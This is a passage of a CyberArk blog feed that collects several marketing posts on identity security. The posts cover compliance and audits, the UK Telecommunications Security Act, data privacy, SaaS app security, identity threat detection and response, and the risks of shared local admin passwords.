With this approach, you can gain a comprehensive view of who has privileges and authorization to what resources, with capabilities for discovering, adjusting, certifying and revoking access.

With identity security, you can bring together:

  • Session recordings and audit trails for high-risk scenarios – applied to highly privileged IT users and third-party vendors or workforce users in web applications storing sensitive data.
  • User behavior analytics for building a knowledge of each user’s access behavior, authentication history, and anomalous activity.
  • Audit trails to track and analyze privilege elevation attempts for human users and applications, enabling continuous visibility and control over endpoints.
  • Integration with security information and event management (SIEM) tools for collecting/exporting log data.

Gaining Efficiencies to Help Overstretched Security Teams

Improved visibility and controls can help you build a proactive stance to meet auditors’ requirements. But how do you account for the limitations many organizations have regarding time, bandwidth and staffing?

For example, research shows that the mean time for organizations to identify a data breach is 204 days. And yet, the SEC now requires public companies to report attacks within four days of determining an incident is “material.”

How can organizations be proactive when timelines are tighter than ever?

Organizations can gain back time and potentially save money by applying automated capabilities to replace resource-intensive, manual tasks that often bog down security teams. This includes automating governance processes to ensure checks and balances are in place for maintaining compliance.

For example:

  • Continuously enforcing least privilege with access reviews and certifications scheduled for recurring dates.
  • Integrating access certification processes with your privileged access management (PAM) program and generating detailed logs and reports for audits.
  • Continuously discovering which identities have access to specific privileged accounts and sensitive resources.

Building Compliance Strategies to Earn Auditors’ Trust

Visibility and controls can’t exist in a vacuum; they need to be part of a strategy that you can communicate to auditors. Here are three key building blocks for developing a compliance program that reflects today’s realities.

1. Discover and Plan
As mentioned, you can only secure and protect what you know. This part goes beyond an inventory or system discovery process to include:

  • Engaging in dialogue with relevant teams (application, support, etc.) to understand how they currently work.
  • Documenting their systems and access – but also ensuring they’re on board early. Successful adoption requires winning hearts and minds.

2. Implement and Rollout
If you’re regulated or if external auditors have called out gaps in controls, focus your implementation on a combination of:

  • Prioritizing critical systems and reducing complexity, e.g., avoid getting bogged down by low-priority, high-complexity use cases.
  • Employing automation from the implementation, e.g., automated checks and balances, to ensure recurring access certifications.

3. Expand and Communicate
You can’t do everything on day one. But in the same breath, attackers only need one gap to breach and wreak havoc. A proactive approach means building:

  • A clear plan for how you intend to bridge gaps identified in your discovery process. Audits and reviews are always a work in progress.
  • An implementation roadmap for a) progression tracking and b) open dialogue with regulators to discuss plans, goals and gains.

Building a Proactive Compliance Approach Centered on Identity Security

The best practices we’ve discussed apply to a wide range of frameworks and regulations across industries and geographic regions. No matter what, the connection between a strong security posture and a strong compliance program is clear. If you have full visibility into what your identities can access, complemented by controls for securing that access, you’ll be in a much better place to meet auditors’ requirements.

If you’d like to learn more, here are two resources that can help you:

John Natale is a senior content marketing manager at CyberArk.

]]>
How Telecom Providers Can Bolster Identity Security to Meet the UK TSA https://www.cyberark.com/blog/how-telecom-providers-can-bolster-identity-security-to-meet-the-uk-tsa/ Tue, 14 Nov 2023 21:28:23 +0000 https://www.cyberark.com/?p=184254 Bolster Identity Security

As technology evolves, so do the threats that loom over our communication infrastructure. The rollout of 5G, the rise of artificial intelligence (AI) and our ongoing dependence on these networks combine to make the telecommunications industry a prime target for cyberattacks.

The consequences of attacks on telecommunications organisations – usually a component of critical national infrastructure – can be far-reaching, extending beyond affecting corporate interests and compromising staff and customer identity security, right up to affecting national security. As such, regulators and operators are motivated to act in tandem to protect these critical national assets.

The Growing Threat to Telecom Providers

Over the last few years, several cybersecurity regulations have set out requirements for how telecom providers are required to approach and implement security. Some are specific to the telecom sector, like the U.K.’s Telecommunications (Security) Act (TSA). In contrast, others are generic – like the NIS2 directive, which applies to multiple critical industry sectors, telecommunications being one.

Driving these global security efforts in the telecom industry is a collective recognition and awareness of not just the severity of the potential threat but the interests of billions of users. With this shift, many advanced economies are increasingly placing the onus and burden of protection on the shoulders of the big telecom providers, prominent actors in the digital ecosystem who can absorb and implement that responsibility. As a result, stakeholders are subjecting telecom providers’ services and networks in their downstream supply chain to high scrutiny, especially concerning identity security – like vendor admin access – and managed service provider (MSP) contract requirements and obligations.

This scrutiny is welcome because telecommunications providers – though very different in terms of the services they provide and infrastructure that they sit on compared to, for instance, a bank – are vulnerable to cyberattack in very similar ways to other organisations that have fully embraced the power of software, digitalisation and the cloud. Attacking the software supply chain of an organisation that has an extensive digital ecosystem is a proven method of infiltrating the target infrastructure to compromise identity security, extract privileged credentials, modify scripts, spread malware, take sensitive data and many other potentially devastating actions. The effects can and often are magnified beyond users of the compromised software to their customers, suppliers and partners.

The drive to up the cybersecurity game across telecommunications infrastructure is a global phenomenon, which stems from recognizing how fast and how far the threat landscape has evolved. In attempts to address the current threat landscape, many countries are now updating their legislative frameworks, while others – like the U.K. – have recently made updates.

“While the scope of the TSA is broad, there are smart ways that telecom providers can achieve significant wins, in particular by ensuring identity security is maintained, with the knowledge that the majority of breaches and attacks involve the compromise of identities as an essential step for attackers…”

Building Telecommunications Cybersecurity Resilience

The U.K., like many other countries, is home to a competitive telecommunications market serving its 68 million residents. Recognizing the critical importance of securing the nation’s telecommunications industry, in 2020, the National Cyber Security Centre (NCSC) conducted its security analysis for the U.K. telecom sector, highlighting the risks associated with telecommunication companies’ supply chains, especially those linked to high-risk vendors such as non-national infrastructure suppliers. The U.K. government subsequently passed the TSA in 2021 to address these concerns and bolster national infrastructure security.

The TSA empowers the U.K.’s communications regulator Ofcom (Office of Communications)  to intervene in the cybersecurity practices of telecom service providers. It establishes a comprehensive security framework to identify, reduce and mitigate security risks. Furthermore, the accompanying 2022 Telecommunications Security Code of Practice classifies public telecom providers into one of three tiers based on their commercial scale, each with distinct compliance obligations and measures in the code to comply with. The Code of Practice document outlines specific timelines, with Tier 1 providers having to implement some measures as early as March 31, 2024. In cases of non-compliance, Ofcom can issue financial penalties.

The three provider tiers are:

  • Tier 1. Public telecom providers with annual revenue over £1 billion
  • Tier 2. Public telecom providers with annual revenue over £50 million but less than £1 billion
  • Tier 3. Public telecom providers with annual revenue of less than £50 million

Implementing the TSA requirements is no small task. It introduces a comprehensive security framework that must be applied across complex and extensive networks, interconnected systems and legacy infrastructure. Reevaluating current security practices, identifying vulnerabilities and making necessary adjustments is resource intensive. Moreover, it may impact ongoing network upgrades and transformation projects. Collaboration with internal stakeholders and coordination with regulatory bodies add to the complexity.

Preparing to Meet TSA Requirements Now

Telecom providers, services and networks in the U.K. are now under pressure to dial up their cybersecurity posture, take accountability and present to Ofcom what cybersecurity measures are in place. The 2022 Telecommunications Security Code of Practice also outlines specific technical requirements in areas such as network architecture, data and network protection, supply chain management and identity security to help organisations prepare.

While there is an enormous amount of information to absorb, here are four simple steps we suggest to help you get started now:

  1. Plan based on your tier classification. Take time to read and absorb available legislation materials applicable to your tier classification, and keep in mind that more rigorous regulations are coming.
  2. Define your scope and conduct an asset inventory. Identify which systems and operations are in scope for the regulation and prioritise work according to the timelines set by the tiered classification guidance.
  3. Scrutinize your supply chain. Supplier assurance is a huge part of achieving compliance with 80 codes of practice measures related to supply chain validations. Identify and develop a system for validating and managing your supply chain appropriately.
  4. Seek help from a reputable partner. Work with an experienced cybersecurity partner that can help interpret the regulation, understand your organisation’s current scope and posture, and devise a plan to help you achieve compliance.

While the scope of the TSA is broad, there are smart ways that telecom providers can achieve significant wins, in particular by ensuring identity security is maintained, with the knowledge that the majority of breaches and attacks involve the compromise of identities as an essential step for attackers – nation-state and other bad actors – to achieve their goals.

One of the fundamental TSA principles (point 1.11) is “assumed compromise,” a cybersecurity mindset that expects an organisation to be breached if it hasn’t already been. This assumption leads to the expectation that any identity across your organisation – whether human or machine – may be compromised. Therefore, your focus should be on identifying, isolating and stopping threats.

Assumed compromise is also a foundational tenet of Zero Trust architecture, where all identities are continuously authenticated and authorized before securely granting just-in-time (JIT) access with the right set of permissions.

Specific actions to reduce the attack surface should include introducing the following capabilities:

  • Securing, logging and monitoring privileged access for internal and external users.
  • Removing default passwords for systems, users and applications.
  • Discovering and onboarding unmanaged privileged accounts and credentials Detect anomalous behavior and indicators of compromise with policy-driven remediation capabilities.
  • Removing local admin rights and implementing application controls will limit what the users can do on specific endpoints and which applications are whitelisted.
  • Ensuring every user is who they claim to be with strong, contextual, risk-based authentication.

Telecom Providers: Guardians of the Grid

The telecommunications industry’s critical role in our connected world necessitates rigorous security measures. The TSA and accompanying Telecommunications Security Code of Practice provide a much-needed framework to ensure the resilience and integrity of our communication networks in the U.K. Introducing the TSA and potential fines imposed by Ofcom compels telecom providers to adopt a new approach and invest in a robust security strategy. In our evolving digital landscape, telecom providers are the guardians of the grid, and their commitment to protecting critical national infrastructure is essential for a secure and connected future.

CyberArk, with many years of experience partnering with the U.K.’s largest telecom providers, has closely collaborated with the U.K.’s NCSC to comprehend the complex technical requirements of the TSA. Check out our eBook, “Identity Security: Why It Matters and Why Now,” to learn how CyberArk’s Identity Security framework – grounded in Zero Trust and intelligent privilege controls – can help your organisation defend against identity-centric threats.

 

Mark Seddon is CyberArk’s Director of Solution Engineering UKI; Violeta Pavel is CyberArk’s Director of Corporate Sales EMEA.

]]>
Identity Security’s Crucial Role in Safeguarding Data Privacy https://www.cyberark.com/blog/identity-securitys-crucial-role-in-safeguarding-data-privacy/ Thu, 09 Nov 2023 17:46:51 +0000 https://www.cyberark.com/?p=184232 Digital fingerprint illustration depicting data and its relationship to identity security.

More than 130 global jurisdictions have enacted data privacy laws. While each contains rules and requirements distinct to their regions, they share a common priority: identity security.

That’s because if an attacker compromises a single identity in an organization where sensitive data is collected, stored and handled, it’s all downhill from there. A single stolen credential – an IT admin’s SSH key, a developer’s secret or a vendor’s password – is the starting point for a nefarious momentum that’s tough to stop. This is why securing the identities that can access sensitive data and the identity-rich infrastructure where your data lives is essential.

Read on for an examination of why identity security should live at the core of data privacy strategies and provide best practices.

What’s at Stake? Data’s Value and Inherent Risks

In today’s digital age, data is the lifeblood of businesses and organizations, fueling decision-making, innovation and customer trust. And the benefits of being an effective data steward are often rooted in outcomes that don’t happen. For example, a health insurance company that keeps its members’ data off the dark web won’t appear in reputation-damaging headlines; that’s the ideal outcome. A consumer technology company that protects its users’ data from breaches won’t join the ranks of firms contributing to the billions other companies have paid in General Data Protection Regulation (GDPR) fines.

The list goes on; the stakes keep rising.

In short, data is the currency of the digital economy. It can be quietly stolen, sold and exploited relatively easily, making it an attractive target. And the owners of personal data have very few options for stopping these outcomes. If consumers learn their credit card information was affected by a breach, they can cancel the card or change the password relatively easily. In contrast, personal data is far more challenging to modify once compromised. It is intrinsic to who you are, the life you’ve built and every entity you engage with – people, healthcare institutions, businesses and governments.

Controlling Access to Data: Start with Identity

This heightened value of data underscores the need for comprehensive data privacy measures and strong identity security controls and hygiene. And the pressure is on. Regulations like GDPR, the California Consumer Privacy Act (CCPA) and the Network and Information Systems (NIS2) directive in the EU have set stringent standards for data protection. But the job of securing data is complex. Across privileged IT users and everyday employees, there are too many identities and privileges to handle. The economic pressure and staff burden make it impossible for security teams to keep up with access certification.

Data privacy begins with controlling who can access sensitive information. In the realm of identity security, this involves managing access rights effectively. Whether it’s sales representatives accessing customer data, HR professionals handling sensitive employee information or IT managers overseeing system resources, it’s essential to maintain the principle of least privilege (PoLP) to ensure that only the right people have access to specific data, reducing the risk of unauthorized data exposure. This requires comprehensive identity and access management (IAM) controls and capabilities.

Here are two examples:

  • An adaptive form of multi-factor authentication (MFA) can enable organizations to strengthen their security posture through additional checks to validate identities in multiple layers.
  • Automated lifecycle management can help organizations easily define and enforce each user’s unique role, responsibilities and access privileges.

Data Location and Privileged Access: Where PAM Comes into Play

While controlling access to data is crucial, securing the infrastructure where data is stored and managed is equally essential. This is where privileged access management (PAM) controls come into play.

Consider admins needing access to critical databases or engineers responsible for maintaining cloud-based storage and data services. A comprehensive PAM program, rooted in fundamentals but evolved to secure a broader range of identities, can ensure:

  • Access is tightly protected with layers of powerful, holistic control, helping organizations adopt a Zero Trust mindset and deliver measurable cyber-risk reduction.
  • Privileged users’ sessions are fully isolated and monitored to prevent the spread of malware and monitor end user behavior for forensics, audit and compliance purposes – without sacrificing the native user experience.
  • Identities are continuously verified with strong authentication mechanisms, including biometrics, to help validate identities following a Zero Trust philosophy.
  • Users’ web application and cloud services sessions are secured, which is crucial in preventing malware and providing audit trails.

Also worth mentioning: encryption plays a pivotal role in safeguarding data, ensuring that even if unauthorized access occurs, the data remains unreadable.

Privilege and Machines: Protecting Non-human Identities

In the context of data privacy, privilege isn’t limited to human users alone – especially at a time when machine identities outnumber human identities by 45:1. Non-human entities like servers, applications and automated processes also require identities and privileges.

It’s essential to align these non-human identities with PoLP to limit access to only what’s necessary. Furthermore, the authentication of machines must be fortified to prevent misuse or compromise. Secrets management and credential rotation are as critical for non-human identities as humans, and organizations look to secure them without compromising agility and development workflows.

Here are a few best practices to apply:

  • Integrate secrets management with existing tools and applications to simplify secrets management.
  • Centralize secrets management and reduce secrets sprawl.
  • Automate security functions to improve operational efficiency.
  • Provide easy-to-use options for developers.

Reporting and Audit: Ensuring Compliance

Complying with data privacy regulations requires meticulous reporting and auditing processes. Organizations must provide specific insights into their data security practices and demonstrate adherence to best practices. In this context, data sovereignty becomes increasingly relevant as regulators and organizations work to maximize ownership and control of data.

The problem is that economic pressures such as staffing and resource gaps make it hard for security teams to keep up with audit and reporting demands.

This exemplifies how automation can help – and why it’s essential. The work associated with compliance will only increase; if teams aren’t growing in parallel, you need efficiencies that can help you scale up to audit requirements. Automated access certification processes and ensuring a constant review of existing entitlements can help remove time-consuming manual tasks from the equation.

A Zero Trust approach is standard practice for compliance across industries. This means working under the assumption that all users and devices are implicitly untrusted and must be authenticated, authorized and continuously validated regardless of location or network.

Many directives and guidelines reflect Zero Trust principles; in conversations with auditors, it’s essential to show which identities have access to what resources and demonstrate what controls you have in place to secure it all.

High-Risk Access in the Cloud and Zero Standing Privilege

Cloud environments are complex, and the sheer number of servers and accounts makes it easy to overlook security configurations, making robust identity security controls in the cloud crucial. In turn, misconfiguration of cloud access is a common pitfall for organizations’ security. Recent data breaches have highlighted the importance of proper cloud access management. Many incidents result from simple misconfigurations rather than sophisticated cyberattacks.

But there’s hope. Pursuing zero standing privileges (ZSP) can significantly reduce the risk of identity compromise and credential theft and misuse. By limiting access to only what is necessary for a specific task and reducing standing privileges to the minimum, ZSP enhances data security and privacy.

Especially in developing their own cloud-based software offerings, implementing least privilege and ZSP principles can help organizations meet requirements for data privacy regulations and earn SOC 2 or ISO 27001 certifications. These certifications also accelerate growth opportunities by building trust and credibility for consumers.

While zero standing privilege (ZSP) is often associated with privileged access, a growing discussion exists about extending its application to data consumers across departments, such as HR, sales and finance. Ensuring all users operate under PoLP is a proactive step toward bolstering data security and compliance.

Protecting Data in Today’s Threat Landscape

Data privacy and security remain critical for organizations and the stakes are higher than ever. With regulations and frameworks increasing, the rising value of data and the integration of data-driven technologies all demand a proactive approach to identity security. Organizations must prioritize robust identity security controls and hygiene, implement ZSP and stay abreast of evolving compliance requirements to safeguard their most valuable asset: data. By doing so, they can mitigate risks, protect customer trust, and thrive in a world where data is the new currency.

Lilach Faerman Koren is a product marketing manager at CyberArk.

]]>
Building Secure and Compliant SaaS Apps – Identity Security Best Practices https://www.cyberark.com/blog/building-secure-and-compliant-saas-apps-identity-security-best-practices/ Fri, 03 Nov 2023 15:29:59 +0000 https://www.cyberark.com/?p=184076

Do you need to secure high-risk access to the back end of your customer-facing apps? Yes, you do – assuming you care about cybersecurity risk, uptime or compliance with SOC II and NIST and AWS, Azure and GCP architecture frameworks.

To meet compliance requirements and grow your business, you must properly secure access to the cloud services and workloads powering your SaaS app. No matter the size and scale of your cloud-hosted app, addressing identity security-related compliance requirements is a necessary step to grow your business – especially when working with customers in highly regulated industries.

Sensitive data is sensitive data. Auditors assessing compliance with SOC II, NIST and other compliance standards don’t care if organizations are lifting and shifting apps to VM workloads or building on containers and serverless functions. Auditors don’t care which cloud providers a dev team uses to build their apps. And auditors definitely don’t care about the cool microservices architectures, design assessments and sprint deadlines top of mind for your engineering teams.

Auditors only care that companies properly secure all identities accessing sensitive data in their applications.

Here’s the good news: several identity security and privileged access management (PAM) best practices can help organizations reduce risk and build SaaS apps that comply with SOC II, NIST and other standards.

The following are several of these proven best practices.

Implement Least Privilege

Compliance frameworks require organizations to adhere to the principle of least privilege (PoLP), a foundational cybersecurity concept. Frameworks differ in their terminology – SOC II has requirements for “logical access control,” for example, while the NIST Cybersecurity Framework explicitly uses the term “least privilege.” But make no mistake – to build compliant SaaS applications, organizations need to ensure all identities have the minimum necessary entitlements to perform their duties.

Organizations must, in the words of the AWS Well-Architected Framework, Implement the principle of least privilege and enforce separation of duties with appropriate authorization for each interaction with your AWS resources.

Identity security programs can meet these requirements by:

  • Removing local administrator rights on developer endpoints, reducing the risk of credential theft.
  • Onboarding local admin credentials to PAM solutions for automatic rotation and role-based access control, further reducing the risk of stolen credentials.
  • Reducing excessive permissions in multi-cloud environments with Cloud Infrastructure Entitlements Management (CIEM) CIEM is emerging as a core element of PAM programs that reduces the risk of lateral movement. This includes reviewing cloud IAM roles and removing access to protected information assets and services.

Implement Least Privilege

 

Aim for Zero Standing Privileges (ZSP) With All Operational Access

Once least privilege is in place, organizations must secure privileged access. To meet compliance, many organizations are embracing the emerging security philosophy of zero standing privileges (ZSP). This security principle’s methodologies build on the foundation of least privilege by elevating access just-in-time and minimizing the use of long-lived passwords and credentials to access cloud workloads and services.

Leading cloud service providers recommend using federated access models – not shared accounts – for access to workloads and services. Developers, site reliability engineers and data scientists are able to assume IAM roles without the use of standing credentials. As a result, most developer access can be considered operational; cloud users do not need persistent access to resources, they only need them for specific tasks.

Organizations can satisfy audit and compliance requirements for this operational access by embracing a ZSP approach. Key elements of ZSP include:

  • Elevating console and CLI access to cloud services on a just-in-time basis, using roles scoped with the minimum necessary permissions for the task at hand. Examples include accessing CSP services to change networking, database and compute auto-scaling configurations.
  • Elevating access to workloads running on the cloud on a just-in-time basis. Examples include operational access to Linux and Windows VMs for lift-and-shift apps, or Kubernetes and other containers for apps running cloud-native, microservices architectures.
  • Integrating access request workflows with existing developer tools to avoid slowing velocity. Developers often need to request additional access to solve issues during outages or critical situations (aka critsits). Making it easy – and fully auditable – is essential for compliance.

Securely Manage and Rotate Credentials Used for Standing Access – Including Application Secrets

Even in the cloud, some long-lived, system-level access is inevitable. Common examples include the root and registration accounts required to establish a cloud footprint, DevOps secrets used by applications, service accounts and other machine identities – and administrative accounts for lift-and-shift software workloads running inside VMs, such as admin accounts for ERP, database or security systems.

Security and compliance strategies must account for the heightened risk these long-lived, system-level accounts represent. Long-established approaches to PAM and secrets management can help. Examples include:

  • Discovering credentials used by administrators, service accounts and other identities and onboarding them to a PAM solution. This reduces the risk of credential theft.
  • Centrally managing secrets used by developers, including through integration with CSP native secret stores. This approach to secrets management enables developers to use their preferred tools while enabling credential management and rotation that meets compliance objectives.
  • Automatically rotating credentials at intervals aligned with organizational policy (which are often specified in compliance frameworks).
  • Logging all usage of privileged accounts to deter insider threats. To maximize audit efficiency, centrally store audit trails for both sessions using shared privileged accounts or sessions using federated access with Zero Standing Privileges.
  • Isolating usage of these accounts to prevent ransomware and other malware from reaching VMs and other cloud workloads.

Extend Identity Security to Your Third-Party Vendors

Internal employees aren’t the only human identities with access to the backend of your SaaS apps. Many organizations leverage remote, third-party vendors and contractors to set up or run the cloud workloads and services powering their apps.

Auditors assessing compliance with leading cybersecurity frameworks often zero in on this access. SOC II compliance in particular relies on specific requirements to manage remote access and all points of access to data. Organizations can demonstrate compliance with these requirements with familiar strategies. Examples include:

  • Managing all points of remote access to data – for both internal and external identities like contract developers, IT contractors and other third-party vendors.
  • Removing any standing privileged access for third-parties to cloud workloads and services. Excessive third-party access has been linked to several data breaches of cloud environments in recent years.
  • Enforcing strong, biometric authentication on third-party access to the back end of SaaS apps.

Apply Strong Authentication and Monitoring for Defense-in-Depth

Access control is a powerful way to reduce risk. But embracing the Zero Trust paradigm requires organizations ‘never trust’ and ‘always verify’ access to their cloud environment.

This same Zero Trust philosophy can provide additional value to organizations as they strive to build secure, compliant applications. To strengthen compliance with SOC II and other frameworks, organizations should consider additional defense-in-depth controls such as:

  • Enforcing strong, adaptive multi-factor authentication (MFA) and identity threat detection on all attempts to access the back end of SaaS apps. This should include authenticating third-party identities and applying controls like step-up and continuous authentication.
  • Ensuring all machine-to-machine connections are authenticated.
  • Monitoring all high-risk sessions to workloads and services, with full audit trails. To maximize insight, screen recording and video playback can help auditors and forensics teams streamline their tasks.
  • Systematically reviewing and certifying access, removing entitlements to ensure access permissions align with job roles and responsibilities.
  • Implementing capabilities to ensure prompt response to misuse of privileged accounts or any high-risk access.

These identity security best practices can strengthen your compliance initiatives. To learn more about building compliant SaaS apps, check out our whitepaper, “2024 Playbook: Identity Security and Cloud Compliance.”

Sam Flaster is a director of product marketing at CyberArk.

]]>
Why ITDR Matters for Your Enterprise’s Identity Security https://www.cyberark.com/blog/why-itdr-matters-for-your-enterprises-identity-security/ Tue, 31 Oct 2023 19:03:03 +0000 https://www.cyberark.com/?p=183851 identity threat detection

You may not recognize the term Identity Threat Detection and Response (ITDR), but this emerging security discipline aims to address an all-too-familiar challenge: managing and securing the massive number of identities – human and machine – across the enterprise.

What is ITDR?

To understand ITDR, it’s helpful to first define what ITDR is not. ITDR isn’t a silver-bullet cybersecurity solution that offers complete identity protection from security breaches; there is no such thing. It isn’t a group of identity and access management (IAM) prevention controls. ITDR coverage isn’t limited to a specific area such as the endpoint, nor is ITDR meant to detect a broad swath of cyber threats.

Instead, ITDR is a system of structured processes, cross-functional team collaboration and threat intelligence and behavior analysis tools working in concert to protect the identity infrastructure itself. ITDR adds a defense-in-depth layer to preventive identity security defenses – such as privileged access management (PAM), multi-factor authentication (MFA) and identity governance and administration (IGA) – to rapidly remediate identity-centric attacks. ITDR supports Zero Trust by employing detection and response mechanisms to identify potential threats, examine any suspicious activity during and after the authentication and authorization process and take the appropriate countermeasures through security orchestration and response.

Graphic illustrating what ITDR is.

Why Does ITDR Matter?

In this ITDR crash course, you’ll explore eight adoption drivers that demonstrate why ITDR matters and how it fits into the broader cybersecurity picture.

  • If you can’t trust the identity or identity source, you can’t trust any security control. Threats that target identity infrastructures can compromise an entire environment – underscoring the need for ITDR. Similarly, the infamous SolarWinds software supply chain breach showed that if an attacker can successfully infiltrate systems with privileged access to high-value systems and data, they could potentially impersonate any human or machine identity, pass any authentication/ authorization challenge and other entitlement controls and rapidly escalate privileges to reach their goal. To counter these sophisticated threats, organizations must implement strong controls to block and contain attacks from the start. But assuming that your environment has already been breached also means adopting ways to rapidly identify and analyze post-authentication red flags, then take appropriate countermeasures to safeguard the trustworthiness of the identity infrastructure through security orchestration and response.
  • Identities are everywhere. IT security professionals understand that stolen, abused or misused identities – whether privileged or not – are a gateway to sensitive information. According to the CyberArk 2023 Identity Security Threat Landscape report, nearly all IT security professionals (99%) anticipate an identity-related compromise this year. Unaddressed identity risks due to economic slowdown, an expected 240% growth in human and machine identities, increased cloud migration and accelerating attacker innovation are all contributing factors.
  • In the security operations center (SOC), most threat detection tools monitor a broader scope to cover many use cases. HelpNetSecurity reports that on any given day, the SOC team receives about 4,484 threat alerts from these systems and spends nearly three hours on manual triage. Overwhelmed by false positives coming from disjointed tools, 97% of SOC analysts worry about missing a relevant security event. According to the 2023 Verizon DBIR, 74% of security breaches involve the human element (i.e., social engineering attacks, errors and misuse), so there’s a good chance those missed events tie back to identity. Unlike most SOC tools, identity-based threat detection tools specifically aim to protect the identity infrastructure to maintain the trust of the identity database.
  • Individual user access control often ends after the authentication/authorization process. Most of today’s threat detection and response tools focus on very specific threats. For example, EDR tools focus on the endpoint and lack visibility and control beyond that (e.g., cloud-based applications and infrastructure and local datacenters are not under the EDR coverage). Controlling and monitoring user access to different environments requires a more centralized and granular solution that focuses on the identity infrastructure. With this approach, organizations can continue to monitor the user session – regardless of the environment – after the authentication and authorization process. This allows them to respond to threats quickly and reduce possible breaches to identity infrastructure.
  • Identity security isn’t linear. Since identity is the perimeter, a security continuum – not a straight line – is the only way to continuously track trust. With ITDR, policy-based threat prevention, detection and response exist in a continuous feedback loop, constantly learning from – and acting upon – identity threat insights. A centralized threat analysis engine automatically detects anomalous behavior that, on its own or in combination with privileged access misuse, could be a potential threat, along with risky access to both business applications and privileged accounts. The engine also tracks the entire chain of events leading up to these suspicious actions to streamline investigations and create clear audit trails.
  • Innovation can’t wait. Adaptive authentication and continuous threat monitoring mechanisms look at user behavior history and context to discern typical activities from risky ones. When they detect risky behavior (e.g., connection via a new IP address or OS, multiple failed logins or suspected credential theft), they can automatically move the user into a “risky user group,” update the MFA policy in real time (e.g., requiring more difficult factors like number-matching challenges) and temporarily limit or revoke access. Meanwhile, actionable identity-based analytics strengthen the broader cybersecurity product stack and deepen the enterprise’s overall threat intelligence capability.
  • Teamwork makes the dream work. Preventing attacks requires skilled security analysts with specialized knowledge and cloud adds another complexity factor. But cybersecurity shortages make this difficult: more than four out of five companies say they have fewer than five security analysts or don’t have enough analysts to run the SOC, reveals a Censuswide study. Under-staffed SOC teams are forced to act broadly, making rapid decisions based on experience and information at hand. These professionals aren’t deeply entrenched in identity access management (IAM), which is usually a separate function in the organization. ITDR challenges this siloed model by synchronizing identity data and unifying cross-functional security teams to expand the SOC. This isn’t a shift that happens overnight, but organizations that prioritize it can dramatically enhance identity protection and bridge knowledge gaps, while creating a centralized, end-to-end threat detection and response flow in the closest real-time way possible.

ITDR Supports Zero Trust and Enhances Cyber Resilience

Changes in the digital environment have upended conventional thinking and positioned identity in cybersecurity’s center. And recent attacks on identity infrastructure underscore the need for a Zero Trust model involving least privilege enforcement and continuous threat detection for every identity across its lifecycle. This is the only way to truly ensure that only the right users access only the right resources at only the right times and for only the right reasons.

ITDR supports Zero Trust by continuously monitoring threats and automatically responding to attacks to help businesses keep their identity infrastructures secure. Now is the time to dig deeper into this critical security discipline and discover the benefits of implementing ITDR as part of a holistic identity security approach.

Claudio Neiva is CyberArk’s Field Technology Director (LATAM), PAM and Identity Security. For best practices and advice to help you plan your Zero Trust approach within your organization, check out Neiva’s new whitepaper, “Guiding Your Leadership Team Through the Zero Trust Mindset.

]]>
Skeleton Keys and Local Admin Passwords: A Cautionary Tale https://www.cyberark.com/blog/skeleton-keys-and-local-admin-passwords-a-cautionary-tale/ Thu, 26 Oct 2023 17:59:23 +0000 https://www.cyberark.com/?p=183739 Image of a pile of metal, antique-looking skeleton keys.

Picture yourself immersed in your favorite mystery novel, eagerly flipping through the pages as the suspense thickens. You’re enthralled, engrossed in the story of a hotel burglar with an uncanny ability to sneak into guest rooms without leaving telltale signs of break-ins or lock-picking.

As you read on, you’re captivated – and stumped – by how this elusive bad actor can deftly close the doors behind them, leaving no clues. The enigma builds and ultimately is paid off with a thrilling finale when the secret is revealed: a singular, powerful tool called a “skeleton key.”

Unlike regular keys unique to a specific lock, a skeleton key has a shape that enables it to work in multiple locks by manipulating their internal mechanisms. It’s like a universal access pass, granting effortless entry without requiring individual keys for each lock. This makes it a versatile tool, ideal for someone looking to navigate and access various spaces easily. Skeleton keys are still widely used – you more likely know them as “master keys” or “arrow keys.”

Just like in our favorite detective novels, bad actors use master keys to access things like mailboxes, luggage, apartments, hotel rooms and even to pull off bank heists.

Skeleton keys embody a trade-off between security and convenience that today’s security teams are intimately familiar with.

  • Pros: On one hand, they offer unparalleled convenience, enabling swift access to many locks with a single tool. This efficiency appeals to those who routinely need to navigate spaces without carrying a massive key ring.
  • Cons: However, this convenience comes at the cost of security. The universal nature of the skeleton key means that if it falls into the wrong hands, it poses a significant security risk, potentially granting unauthorized access to areas and compromising the safety measures that locks are meant to provide.

And, of course, there’s a digital version of these keys used for cybercrime.

Skeleton Keys in the Digital Era: From Bad to Worse

In the digital era, the scale and ease with which a skeleton key equivalent can compromise security have reached unprecedented heights.

Picture vast organizations with tens of thousands of endpoints: workstations and servers, both physical and virtual, scattered across offices, on-premises data centers and cloud environments. It’s not uncommon to encounter a troubling practice where system administration is built around the routine use of local admin accounts, often with the same password – mirroring the concept of a universal skeleton key. Although advantageous for management, this simplistic approach results in a colossal vulnerability – a true Achilles’ heel (!) – akin to granting unrestricted access to an entire hotel’s secret passages and rooms through a single master key.

The implications are profound, and the stakes for IT security have never been higher.

In today’s complex enterprise landscape, the prevalent use of what can be termed as “modern digital skeleton keys” – local administrator accounts – poses a significant risk to organizational cybersecurity. Virtually every endpoint within a system is equipped with at least one of these local admin accounts, presenting a potential gateway for unauthorized access.

Compounding this risk, these local accounts cannot be protected with strong authentication, leaving them vulnerable to relatively easy exploitation. Adding to the concern, security teams can’t employ multi-factor authentication (MFA) to help protect these accounts. That’s because strong authentication and MFA require a source of truth and controls to prevent attackers from cracking or bypassing them.

Local authentication, however, is by definition its own authority and is usually constrained by legacy requirements. For instance, Windows is still using NTLM for local authentication. Also, the lack of an out-of-the-box method for centralized management leaves organizations grappling with scattered and unmonitored access points. Together, these gaps further underscore the urgent need for a comprehensive and secure approach to endpoint privilege management (EPM) and endpoint privilege security (EPS).

Let’s pause here to note that this is the actual state that too many companies are in right now. For these organizations, everything you read next – even the basic mitigations outlined in the next paragraph – is, at best, a part of future cybersecurity strategy, which is a humbling realization about where we are as defenders.

Unpause.

Strategic Steps and Security Controls to Help Reduce Risk

The following are some mitigations your team can implement to help mitigate the risk of local privileged account misuse:

  1. Eliminate the practice of reusing passwords for local admin accounts. Don’t create the “skeleton key” for your entire endpoint infrastructure in the first place! Each local account on every endpoint MUST have a unique password.
  2. Closely monitor local admin account usage. Yes, we understand this can be tricky. Who is the “local administrator” anyway? The answer is in itself a whodunit: Is it someone from IT? Is it the end user? Is it someone who got the password and is already in a system on your network? The simple answer is that it’s whoever currently has the password, and that’s a big part of why every organization needs to have a solid identity security component in their cybersecurity strategy.
  3. Rotate the passwords to local admin accounts frequently, and especially rotate them after each use. This is very important because cyberattackers can use different techniques to compromise the password, on use (e.g., a keylogger or a camera).

